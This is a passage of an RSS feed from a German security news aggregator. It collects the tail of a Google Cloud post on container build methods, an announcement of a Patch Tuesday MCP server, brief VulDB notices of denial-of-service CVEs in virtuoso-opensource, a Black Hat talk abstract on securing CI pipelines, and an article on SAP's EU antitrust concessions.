        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Dive_Image.max-1000x1000.png" alt="Container Image">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>And it starts up super fast because we don't need the JVM, OS, etc. Of course GraalVM is not always a great option as there are some challenges like dealing with reflection and debugging. You can read more about this in my blog, <a href="https://jamesward.com/2020/05/07/graalvm-native-image-tips-tricks/" target="_blank">GraalVM Native Image Tips &amp; Tricks</a>.</p><p>This example does capture the flexibility of the <code>Dockerfile</code> method and the ability to do anything you need. It is a great escape hatch when you need one.</p><h3>Which Method Should You Choose?</h3><p></p><ul><li>The easiest, polyglot method: Buildpacks</li><li>Great layering for JVM apps: Jib</li><li>The escape hatch for when those methods don't fit: Dockerfile</li></ul><p></p><p>Check out my <a href="https://github.com/jamesward/comparing-docker-methods" target="_blank">comparing-docker-methods project</a> to explore these methods as well as the mentioned Spring Boot + Jib example.</p></div>
<div class="block-related_article_tout">





<div class="uni-related-article-tout h-c-page">
  <section class="h-c-grid">
    <a href="https://cloud.google.com/blog/products/containers-kubernetes/google-cloud-now-supports-buildpacks/" data-analytics='{
                       "event": "page interaction",
                       "category": "article lead",
                       "action": "related article - inline",
                       "label": "article: {slug}"
                     }' class="uni-related-article-tout__wrapper h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
        h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3 uni-click-tracker">
      <div class="uni-related-article-tout__inner-wrapper">
        <p class="uni-related-article-tout__eyebrow h-c-eyebrow">Related Article</p>

        <div class="uni-related-article-tout__content-wrapper">
          <div class="uni-related-article-tout__image-wrapper">
            <div class="uni-related-article-tout__image"></div>
          </div>
          <div class="uni-related-article-tout__content">
            <h4 class="uni-related-article-tout__header h-has-bottom-margin">Announcing Google Cloud buildpacks—container images made easy</h4>
            <p class="uni-related-article-tout__body">Google Cloud buildpacks make it much easier and faster to build applications on top of containers.</p>
            <div class="cta module-cta h-c-copy  uni-related-article-tout__cta muted">
              <span class="nowrap">Read Article
                <svg class="icon h-c-icon" role="presentation">
                  <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#mi-arrow-forward"></use>
                </svg>
              </span>
            </div>
          </div>
        </div>
      </div>
    </a>
  </section>
</div>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Patch Tuesday MCP]]></title>
<description><![CDATA[I built an open-source MCP server for Microsoft Patch Tuesday that lets AI assistants like Claude, Copilot, ChatGPT, and more answer patch questions directly from official MSRC data.  Every Patch Tuesday, security teams ask the same questions: what changed, what affects us, what is being exploite...]]></description>
<link>https://tsecurity.de/de/3662627/malware-trojaner-viren/patch-tuesday-mcp/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662627/malware-trojaner-viren/patch-tuesday-mcp/</guid>
<pubDate>Sun, 12 Jul 2026 04:18:05 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I built an open-source MCP server for Microsoft Patch Tuesday that lets AI assistants like Claude, Copilot, ChatGPT, and more answer patch questions directly from official MSRC data. </p> <p>Every Patch Tuesday, security teams ask the same questions: what changed, what affects us, what is being exploited, and what needs to be patched first? </p> <p>Ask things like:</p> <p> “Summarize this month’s Patch Tuesday”</p> <p> “Which of these CVEs are on the CISA KEV list?”</p> <p> “Show me CVEs with an exploitation probability above 50%”</p> <p> “What older patches does KB5094123 replace?”</p> <p> “What Critical CVEs hit Windows Server 2022 this month?” </p> <p>What makes it different: most vulnerability tools can look up a CVE, but they have no concept of a monthly Microsoft release, a KB article, or a product family. </p> <p>This server parses the full MSRC CVRF documents, so it can answer the questions Microsoft shops actually ask on the second Tuesday of every month. </p> <p>It is built around the data sources teams already trust:</p> <ul> <li>Official MSRC Security Update Guide API: Microsoft’s source for Security Update Guide and CVRF data</li> <li>EPSS scores from FIRST.org: daily-updated probability each CVE gets exploited in the next 30 days</li> <li>CISA KEV integration: confirmed-exploited CVEs with federal remediation due dates</li> <li>Supersedence chains: walks Microsoft’s “this KB replaces that KB” links so your assistant never recommends a stale patch</li> <li>Results ranked by real-world urgency: KEV/exploited → EPSS → severity → CVSS</li> </ul> <p>Zero API keys, zero accounts: everything comes from public MSRC, <a href="http://first.org/">FIRST.org</a>, and CISA feeds. Run it locally or remotely. Details below: </p> <p> Repo: <a href="https://github.com/jonnybottles/patch-tuesday-mcp">https://github.com/jonnybottles/patch-tuesday-mcp</a> </p> <p> Remote MCP server endpoint:<br> <a href="https://patch-tuesday-mcp.happyrock-b60185ec.eastus.azurecontainerapps.io/mcp">https://patch-tuesday-mcp.happyrock-b60185ec.eastus.azurecontainerapps.io/mcp</a> </p> <p>If you triage Microsoft updates frequently, I’d love feedback. If there’s a feature you’d use, open an issue. </p> <p>Disclaimer: This is an independent, self-built project and is not an official Microsoft tool or service. </p> <p><a href="https://www.facebook.com/hashtag/patchtuesday?__cft__%5B0%5D=AZaWsH2HX7cjwn_HLMKdlYZlZrEg7wbsP3srqtM9cou8N53dEtHuqAjwKBI6vfqVkZGEEcSsMK6aZ1BOvTnxFDC5V7cFJ18tSCeMLupNz2bnqNURqxph6OnrpqjR_0iZZ7jcw-FzFNgXtIfOHb8wVsBG4AhDfAIvM3_Tsdh1rBoJx1lSpGzwTCS12K9JI6W89sk&amp;__tn__=*NK-R">#PatchTuesday</a> <a href="https://www.facebook.com/hashtag/cybersecurity?__cft__%5B0%5D=AZaWsH2HX7cjwn_HLMKdlYZlZrEg7wbsP3srqtM9cou8N53dEtHuqAjwKBI6vfqVkZGEEcSsMK6aZ1BOvTnxFDC5V7cFJ18tSCeMLupNz2bnqNURqxph6OnrpqjR_0iZZ7jcw-FzFNgXtIfOHb8wVsBG4AhDfAIvM3_Tsdh1rBoJx1lSpGzwTCS12K9JI6W89sk&amp;__tn__=*NK-R">#CyberSecurity</a> <a href="https://www.facebook.com/hashtag/vulnerabilitymanagement?__cft__%5B0%5D=AZaWsH2HX7cjwn_HLMKdlYZlZrEg7wbsP3srqtM9cou8N53dEtHuqAjwKBI6vfqVkZGEEcSsMK6aZ1BOvTnxFDC5V7cFJ18tSCeMLupNz2bnqNURqxph6OnrpqjR_0iZZ7jcw-FzFNgXtIfOHb8wVsBG4AhDfAIvM3_Tsdh1rBoJx1lSpGzwTCS12K9JI6W89sk&amp;__tn__=*NK-R">#VulnerabilityManagement</a> <a href="https://www.facebook.com/hashtag/mcp?__cft__%5B0%5D=AZaWsH2HX7cjwn_HLMKdlYZlZrEg7wbsP3srqtM9cou8N53dEtHuqAjwKBI6vfqVkZGEEcSsMK6aZ1BOvTnxFDC5V7cFJ18tSCeMLupNz2bnqNURqxph6OnrpqjR_0iZZ7jcw-FzFNgXtIfOHb8wVsBG4AhDfAIvM3_Tsdh1rBoJx1lSpGzwTCS12K9JI6W89sk&amp;__tn__=*NK-R">#MCP</a> <a href="https://www.facebook.com/hashtag/ai?__cft__%5B0%5D=AZaWsH2HX7cjwn_HLMKdlYZlZrEg7wbsP3srqtM9cou8N53dEtHuqAjwKBI6vfqVkZGEEcSsMK6aZ1BOvTnxFDC5V7cFJ18tSCeMLupNz2bnqNURqxph6OnrpqjR_0iZZ7jcw-FzFNgXtIfOHb8wVsBG4AhDfAIvM3_Tsdh1rBoJx1lSpGzwTCS12K9JI6W89sk&amp;__tn__=*NK-R">#AI</a> <a href="https://www.facebook.com/hashtag/claude?__cft__%5B0%5D=AZaWsH2HX7cjwn_HLMKdlYZlZrEg7wbsP3srqtM9cou8N53dEtHuqAjwKBI6vfqVkZGEEcSsMK6aZ1BOvTnxFDC5V7cFJ18tSCeMLupNz2bnqNURqxph6OnrpqjR_0iZZ7jcw-FzFNgXtIfOHb8wVsBG4AhDfAIvM3_Tsdh1rBoJx1lSpGzwTCS12K9JI6W89sk&amp;__tn__=*NK-R">#Claude</a> <a href="https://www.facebook.com/hashtag/microsoft?__cft__%5B0%5D=AZaWsH2HX7cjwn_HLMKdlYZlZrEg7wbsP3srqtM9cou8N53dEtHuqAjwKBI6vfqVkZGEEcSsMK6aZ1BOvTnxFDC5V7cFJ18tSCeMLupNz2bnqNURqxph6OnrpqjR_0iZZ7jcw-FzFNgXtIfOHb8wVsBG4AhDfAIvM3_Tsdh1rBoJx1lSpGzwTCS12K9JI6W89sk&amp;__tn__=*NK-R">#Microsoft</a> <a href="https://www.facebook.com/hashtag/msrc?__cft__%5B0%5D=AZaWsH2HX7cjwn_HLMKdlYZlZrEg7wbsP3srqtM9cou8N53dEtHuqAjwKBI6vfqVkZGEEcSsMK6aZ1BOvTnxFDC5V7cFJ18tSCeMLupNz2bnqNURqxph6OnrpqjR_0iZZ7jcw-FzFNgXtIfOHb8wVsBG4AhDfAIvM3_Tsdh1rBoJx1lSpGzwTCS12K9JI6W89sk&amp;__tn__=*NK-R">#MSRC</a> <a href="https://www.facebook.com/hashtag/opensource?__cft__%5B0%5D=AZaWsH2HX7cjwn_HLMKdlYZlZrEg7wbsP3srqtM9cou8N53dEtHuqAjwKBI6vfqVkZGEEcSsMK6aZ1BOvTnxFDC5V7cFJ18tSCeMLupNz2bnqNURqxph6OnrpqjR_0iZZ7jcw-FzFNgXtIfOHb8wVsBG4AhDfAIvM3_Tsdh1rBoJx1lSpGzwTCS12K9JI6W89sk&amp;__tn__=*NK-R">#OpenSource</a> <a href="https://www.facebook.com/hashtag/infosec?__cft__%5B0%5D=AZaWsH2HX7cjwn_HLMKdlYZlZrEg7wbsP3srqtM9cou8N53dEtHuqAjwKBI6vfqVkZGEEcSsMK6aZ1BOvTnxFDC5V7cFJ18tSCeMLupNz2bnqNURqxph6OnrpqjR_0iZZ7jcw-FzFNgXtIfOHb8wVsBG4AhDfAIvM3_Tsdh1rBoJx1lSpGzwTCS12K9JI6W89sk&amp;__tn__=*NK-R">#InfoSec</a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Active_Pick3975"> /u/Active_Pick3975 </a> <br> <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1ut3zp7/patch_tuesday_mcp/">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1ut3zp7/patch_tuesday_mcp/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-61024 | openlink virtuoso-opensource 7.2.11 sqlo_try_in_loop denial of service (Issue 1227 / Nessus ID 326341)]]></title>
<description><![CDATA[A vulnerability has been found in openlink virtuoso-opensource 7.2.11 and classified as problematic. Affected is an unknown function of the component sqlo_try_in_loop. This manipulation causes denial of service.

This vulnerability is registered as CVE-2025-61024. Remote exploitation of the attac...]]></description>
<link>https://tsecurity.de/de/3662298/sicherheitsluecken/cve-2025-61024-openlink-virtuoso-opensource-7211-sqlotryinloop-denial-of-service-issue-1227-nessus-id-326341/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662298/sicherheitsluecken/cve-2025-61024-openlink-virtuoso-opensource-7211-sqlotryinloop-denial-of-service-issue-1227-nessus-id-326341/</guid>
<pubDate>Sat, 11 Jul 2026 20:20:35 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/openlink:virtuoso-opensource">openlink virtuoso-opensource 7.2.11</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected is an unknown function of the component <em>sqlo_try_in_loop</em>. This manipulation causes denial of service.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2025-61024">CVE-2025-61024</a>. Remote exploitation of the attack is possible. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-61025 | openlink virtuoso-opensource 7.2.11 denial of service (Issue 1229 / Nessus ID 326341)]]></title>
<description><![CDATA[A vulnerability classified as problematic was found in openlink virtuoso-opensource 7.2.11. The impacted element is an unknown function. Executing a manipulation can lead to denial of service.

This vulnerability is tracked as CVE-2025-61025. The attack can be launched remotely. No exploit exists.]]></description>
<link>https://tsecurity.de/de/3662297/sicherheitsluecken/cve-2025-61025-openlink-virtuoso-opensource-7211-denial-of-service-issue-1229-nessus-id-326341/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662297/sicherheitsluecken/cve-2025-61025-openlink-virtuoso-opensource-7211-denial-of-service-issue-1229-nessus-id-326341/</guid>
<pubDate>Sat, 11 Jul 2026 20:20:33 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> was found in <a href="https://vuldb.com/product/openlink:virtuoso-opensource">openlink virtuoso-opensource 7.2.11</a>. The impacted element is an unknown function. Executing a manipulation can lead to denial of service.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2025-61025">CVE-2025-61025</a>. The attack can be launched remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[Black Hat Europe 2025 | Bootstrapping Trust: From Isolated Build Machines to Enclaved CI Pipelines]]></title>
<description><![CDATA[Author: Black Hat - Bewertung: 2x - Views:16 This session presents a production-ready approach to securing CI build pipelines against compromised infrastructure by anchoring trust in a physically isolated build machine and leveraging enclave-based builders. The isolated machine compiles and signs...]]></description>
<link>https://tsecurity.de/de/3662082/it-security-video/black-hat-europe-2025-bootstrapping-trust-from-isolated-build-machines-to-enclaved-ci-pipelines/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662082/it-security-video/black-hat-europe-2025-bootstrapping-trust-from-isolated-build-machines-to-enclaved-ci-pipelines/</guid>
<pubDate>Sat, 11 Jul 2026 17:33:03 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Black Hat - Bewertung: 2x - Views:16 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/V411Vadty38?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>This session presents a production-ready approach to securing CI build pipelines against compromised infrastructure by anchoring trust in a physically isolated build machine and leveraging enclave-based builders. The isolated machine compiles and signs a minimal enclave image, which becomes the only entity allowed to build software artifacts in the cloud. The builder enclave image runs inside AWS Nitro Enclaves and enforces strict policy checks such as requiring signed commit hashes before proceeding. Remote attestation is used to verify the AWS Nitro enclave's (the builder) integrity by an Intel SGX enclave verifier before provisioning the build secret, with the SGX enclave serving as a root of trust by encrypting its database with the processor's sealing key.<br />
<br />
We'll detail the threat model, including attackers with SSH or root on CI runners, and walk through a complete enclave build pipeline, showing how trust is rooted in the isolated, air-gapped machine and propagated via the SGX enclave to the Nitro enclave builder. The session includes a demo of a real-world implementation that protects production infrastructure from build tampering and secret exfiltration, even under active adversary conditions.<br />
<br />
Attendees will learn how to design CI pipelines with isolation guarantees similar to air gapped machines but with the build and deployment velocity they are used to in modern cloud environments, integrate enclave attestation into automated builds, and establish a root of trust for critical workloads.<br />
<br />
By: <br />
Ben Liderman  |  System Architect, Fireblocks<br />
Maayan Keshet  |  System Architect, Fireblocks<br />
<br />
https://blackhat.com/eu-25/briefings/schedule/?#bootstrapping-trust-from-isolated-build-machines-to-enclaved-ci-pipelines-49023<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-61018 | openlink virtuoso-opensource 7.2.11 denial of service (Issue 1224 / Nessus ID 326341)]]></title>
<description><![CDATA[A vulnerability categorized as problematic has been discovered in openlink virtuoso-opensource 7.2.11. Affected by this issue is some unknown functionality. Executing a manipulation can lead to denial of service.

This vulnerability is handled as CVE-2025-61018. The attack can be executed remotel...]]></description>
<link>https://tsecurity.de/de/3661998/sicherheitsluecken/cve-2025-61018-openlink-virtuoso-opensource-7211-denial-of-service-issue-1224-nessus-id-326341/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661998/sicherheitsluecken/cve-2025-61018-openlink-virtuoso-opensource-7211-denial-of-service-issue-1224-nessus-id-326341/</guid>
<pubDate>Sat, 11 Jul 2026 16:23:45 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">problematic</a> has been discovered in <a href="https://vuldb.com/product/openlink:virtuoso-opensource">openlink virtuoso-opensource 7.2.11</a>. Affected by this issue is some unknown functionality. Executing a manipulation can lead to denial of service.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2025-61018">CVE-2025-61018</a>. The attack can be executed remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-61020 | openlink virtuoso-opensource 7.2.11 denial of service (Issue 1225 / Nessus ID 326341)]]></title>
<description><![CDATA[A vulnerability labeled as problematic has been found in openlink virtuoso-opensource 7.2.11. This vulnerability affects unknown code. The manipulation results in denial of service.

This vulnerability was named CVE-2025-61020. The attack may be performed from remote. There is no available exploit.]]></description>
<link>https://tsecurity.de/de/3661997/sicherheitsluecken/cve-2025-61020-openlink-virtuoso-opensource-7211-denial-of-service-issue-1225-nessus-id-326341/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661997/sicherheitsluecken/cve-2025-61020-openlink-virtuoso-opensource-7211-denial-of-service-issue-1225-nessus-id-326341/</guid>
<pubDate>Sat, 11 Jul 2026 16:23:43 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/openlink:virtuoso-opensource">openlink virtuoso-opensource 7.2.11</a>. This vulnerability affects unknown code. The manipulation results in denial of service.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2025-61020">CVE-2025-61020</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-61022 | openlink virtuoso-opensource 7.2.11 sqlo_tb_col_preds denial of service (Issue 1226 / Nessus ID 326341)]]></title>
<description><![CDATA[A vulnerability described as problematic has been identified in openlink virtuoso-opensource 7.2.11. Impacted is an unknown function of the component sqlo_tb_col_preds. Such manipulation leads to denial of service.

This vulnerability is referenced as CVE-2025-61022. It is possible to launch the ...]]></description>
<link>https://tsecurity.de/de/3661996/sicherheitsluecken/cve-2025-61022-openlink-virtuoso-opensource-7211-sqlotbcolpreds-denial-of-service-issue-1226-nessus-id-326341/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661996/sicherheitsluecken/cve-2025-61022-openlink-virtuoso-opensource-7211-sqlotbcolpreds-denial-of-service-issue-1226-nessus-id-326341/</guid>
<pubDate>Sat, 11 Jul 2026 16:23:42 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">problematic</a> has been identified in <a href="https://vuldb.com/product/openlink:virtuoso-opensource">openlink virtuoso-opensource 7.2.11</a>. Impacted is an unknown function of the component <em>sqlo_tb_col_preds</em>. Such manipulation leads to denial of service.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2025-61022">CVE-2025-61022</a>. It is possible to launch the attack remotely. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Hugging Face’s CEO on why companies are done renting their AI]]></title>
<description><![CDATA[Open source AI is booming, according to Hugging Face CEO Clem Delangue. The company has grown into something like a GitHub for AI in recent years, where AI builders can share and download open models and datasets, now used by roughly half the Fortune 500. Delangue has seen the same story play out...]]></description>
<link>https://tsecurity.de/de/3660588/ai-nachrichten/hugging-faces-ceo-on-why-companies-are-done-renting-their-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660588/ai-nachrichten/hugging-faces-ceo-on-why-companies-are-done-renting-their-ai/</guid>
<pubDate>Fri, 10 Jul 2026 20:19:09 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Open source AI is booming, according to Hugging Face CEO Clem Delangue. The company has grown into something like a GitHub for AI in recent years, where AI builders can share and download open models and datasets, now used by roughly half the Fortune 500. Delangue has seen the same story play out again and again: companies start […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Soft Skills for the Job Market: Applying for Jobs]]></title>
<description><![CDATA[Author: The Cyber Mentor - Bewertung: 3x - Views:23 https://www.tcm.rocks/ss-y - Find the full and FREE Soft Skills for the Job Market course in the TCM Security Academy. 

https://www.tcm.rocks/acad-summer-y - We're hosting our Summer Sale! Up until July 15th, grab 50% off your first payment to ...]]></description>
<link>https://tsecurity.de/de/3660321/it-security-video/soft-skills-for-the-job-market-applying-for-jobs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660321/it-security-video/soft-skills-for-the-job-market-applying-for-jobs/</guid>
<pubDate>Fri, 10 Jul 2026 18:06:55 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: The Cyber Mentor - Bewertung: 3x - Views:23 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/wDpIQfbusSc?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>https://www.tcm.rocks/ss-y - Find the full and FREE Soft Skills for the Job Market course in the TCM Security Academy. <br />
<br />
https://www.tcm.rocks/acad-summer-y - We're hosting our Summer Sale! Up until July 15th, grab 50% off your first payment to the TCM Security Academy (use the code CAMPTCM to redeem) and 20% off certifications and live trainings. <br />
<br />
We're releasing our Soft Skills for the Job Market course all FREE on YouTube! This course can also be found in the TCM Security Academy. <br />
<br />
Module Three of the Soft Skills course focuses on applying for jobs. We know that this process can be tedious, but hopefully the points made in this module will help you out while sending out applications, researching potential employers, and overall putting your best foot forward. You've got this!<br />
<br />
Get a copy of the TCM Security resume template to help you in your job searching journey: https://www.tcm.rocks/resume-template <br />
<br />
More modules will be dripped out in the near future! Stay tuned.<br />
<br />
Watch the other modules: https://www.tcm.rocks/soft-skills-playlist<br />
<br />
#freecourse #jobsearch #applicationletter #cybersecuritycareers #cybersecurity <br />
<br />
Sponsor a Video: https://www.tcm.rocks/Sponsors<br />
Pentests & Security Consulting: https://tcm-sec.com<br />
Get Trained: https://www.tcm.rocks/acad-y<br />
Get Certified: http://www.tcm.rocks/certs-y<br />
Merch: https://www.bonfire.com/store/tcm-security/<br />
<br />
📱Social Media📱<br />
___________________________________________<br />
X: https://x.com/TCMSecurity<br />
Twitch: https://www.twitch.tv/thecybermentor<br />
Instagram: https://www.instagram.com/tcmsecurity/<br />
LinkedIn: https://www.linkedin.com/company/tcm-security-inc/<br />
TikTok: https://www.tiktok.com/@tcmsecurity<br />
Discord: https://discord.gg/tcm<br />
Facebook: https://www.facebook.com/tcmsecure<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[SAP concedes to EU, freeing CIOs from expensive support shackles]]></title>
<description><![CDATA[The European Commission is ending an antitrust investigation into SAP after the company made numerous concessions worldwide regarding maintenance and support services for on-premises versions of its ERP solution. The Commission began its investigation in September 2025, concerned that SAP forces ...]]></description>
<link>https://tsecurity.de/de/3659505/it-nachrichten/sap-concedes-to-eu-freeing-cios-from-expensive-support-shackles/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659505/it-nachrichten/sap-concedes-to-eu-freeing-cios-from-expensive-support-shackles/</guid>
<pubDate>Fri, 10 Jul 2026 13:17:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The European Commission is ending an antitrust investigation into SAP after the company made numerous concessions worldwide regarding maintenance and support services for on-premises versions of its ERP solution. The <a href="https://www.cio.com/article/4063210/sap-targeted-by-eu-antitrust-investigation-of-its-erp-support-services.html">Commission began its investigation in September 2025</a>, concerned that SAP forces customers to buy its services for longer, and for more licenses, than they need.</p>



<p>In accepting SAP’s commitments, the Commission makes them binding on the company. SAP could still face fines if it fails to make good on its concessions over the next ten years. <a href="https://ec.europa.eu/commission/presscorner/detail/en/ip_26_1554" target="_blank" rel="nofollow">SAP’s promises</a> include:</p>



<ul class="wp-block-list">
<li><strong>Greater freedom of choice in support</strong>: Customers can divide their SAP landscape into sub-areas and choose different support and maintenance providers for each area.</li>



<li><strong>Easier license terminations</strong>: Maintenance and support contracts can be terminated in certain cases — such as when products are phased out, SAP projects fail, the company files for bankruptcy, there are staff reductions, or parts of the business are sold.</li>



<li><strong>More flexible licensing models</strong>: SAP is expanding access to so-called “single-metric” contracts as an alternative basis for licensing and maintenance fees.</li>



<li><strong>Relaxation of contractual obligations</strong>: In the future, the purchase of new licenses will no longer automatically extend the minimum term of existing support contracts.</li>



<li><strong>Easier Re-entry</strong>: Customers who resume SAP support after a hiatus will no longer have to pay reinstatement fees; back payments will also be reduced.</li>
</ul>



<p>In addition, SAP is establishing an internal clearinghouse that customers can contact if they suspect violations of the agreed-upon obligations.</p>



<p>Even though <a href="https://news.sap.com/2026/07/sap-welcomes-european-commission-decision-concluding-investigation-on-premise-maintenance-support-policies/" target="_blank" rel="nofollow">SAP said it welcomed the EU Commission’s decision</a>, the Walldorf-based company is unlikely to be truly happy with the concessions it had to make.</p>



<p>User organizations, though, are happy: Conor Riordan, chair of UKISUG, the UK &amp; Ireland SAP User Group, said, “We welcome the proposed changes to SAP’s support and maintenance policies for on-premise customers. Our members have long called for greater flexibility, transparency and predictability, and these changes appear to be a positive move. This should give organizations more room to adapt to changing business conditions and evolve their SAP estates at a pace that suits them.”</p>



<h2 class="wp-block-heading">More flexibility with SAP support</h2>



<p><a href="https://www.linkedin.com/in/michael-bloch-5b48a0249" target="_blank" rel="nofollow">Michael Bloch</a>, executive director of licensing, contracts and support at DSAG, the German-speaking SAP User Group, went into greater detail in an <a href="https://www.computerwoche.de/article/4195425/eu-bezwingt-sap-so-legen-cios-ihre-teuren-support-fesseln-ab.html">interview with Computerwoche</a>, here translated from the German:</p>



<p><em>How do you assess the European Commission’s decision in general?</em></p>



<p><strong>Michael Bloch:</strong> In principle, we think the decision is a good one for now. Many SAP customers will benefit from it, especially those who continue to run their ERP systems on-premises. Our investment survey shows that numerous companies have still not made the move to the SAP Cloud. They now have significantly more freedom to decide how they want to organize support for their existing software.</p>



<p><em>Who stands to benefit on the provider side? Does the decision open up new opportunities for third-party providers like Rimini Street? Can the potential demand even be met?</em></p>



<p><strong>Bloch</strong>: That will be interesting to watch. At the moment, third-party maintenance is a total niche business, at least in German-speaking countries. Acceptance is significantly higher in the US, but here in Germany, many companies remain rather skeptical of the model. The EU decision could now give this market a new boost. Customers who do not wish to follow SAP’s current strategy will be able to remain on their existing infrastructure in the future and obtain support from another provider. This certainly opens up opportunities for new business models.</p>



<p><em>Does this decision undermine SAP’s cloud strategy?</em></p>



<p><strong>Bloch:</strong> For customers, the decision now truly becomes a matter of principle: Do I follow SAP’s strategic direction, or do I consciously choose a different path? Those who aren’t convinced that the cloud strategy is the right one for their own company can now more easily decide to stay on their existing ERP landscape and, for example, use a different support provider.</p>



<p>However, one must be clear about the consequences. Those who remain on their current system landscape — even with an alternative maintenance provider — are forgoing the innovations that SAP is currently developing around the Autonomous Enterprise. There is no middle ground here. Companies would have to develop many of these functions themselves or recreate them at considerable expense.</p>



<p><em>So is this inevitably an either/or decision?</em></p>



<p><strong>Bloch</strong>: No, that’s exactly the key point. Many companies have heavily customized their ERP systems over the years or decades to fit their industry-specific processes — some customers even refer to “refined” systems. These investments don’t simply have to be written off now.</p>



<p>Instead, companies can continue to operate their proven core systems while simultaneously adding targeted cloud components, such as SAP Cloud ERP for financial processes. This allows them to preserve existing investments while also leveraging new innovations. The EU decision thus opens up additional options for action, but it also makes the strategic decision more challenging for CIOs. They must now define even more precisely what their target architecture should look like for the next five to ten years.</p>



<h2 class="wp-block-heading">2027 – A pivotal year for SAP support</h2>



<p><em>Does this mean that IT decision-makers will now have to forgo a peaceful summer break?</em></p>



<p><strong>Bloch:</strong> I don’t think this will fundamentally increase the pressure. Extended Maintenance doesn’t start until the end of 2027, so there’s still some time left. But companies now have an additional strategic question to answer. The actual decision year is likely to be 2027. By then, many companies will have to determine which system landscape they’ll use in the future and what their long-term SAP strategy will look like.</p>



<p>Even companies that want to stick with their existing ERP landscape will only receive official support until 2030. While that does buy some time, it’s by no means a long planning horizon, especially when alternative ERP strategies or successor solutions need to be evaluated.</p>



<p>That’s why I view it as a positive development that the decision has now been made. It provides clarity and gives companies the opportunity to incorporate these new conditions into their strategic considerations at an early stage.</p>



<p><em>The new regulations also make it easier for companies to dispose of unused licenses and the associated maintenance fees. How significant could the potential savings be?</em></p>



<p><strong>Bloch:</strong> We don’t have specific figures on that. You have to be very careful here, because it depends heavily on the individual case. The key factor is whether a company actually terminates its SAP support entirely, switches to a third-party provider, or simply no longer needs certain products. After all, a system still has to be operated.</p>



<p><em>Is there at least a rough estimate?</em></p>



<p><strong>Bloch:</strong> No, we don’t have reliable empirical data. If companies have products in use that they no longer use at all, they’ll be able to cancel support for them more easily in the future and, of course, save money as a result. However, we don’t know how large this so-called “shelfware” portion actually is.</p>



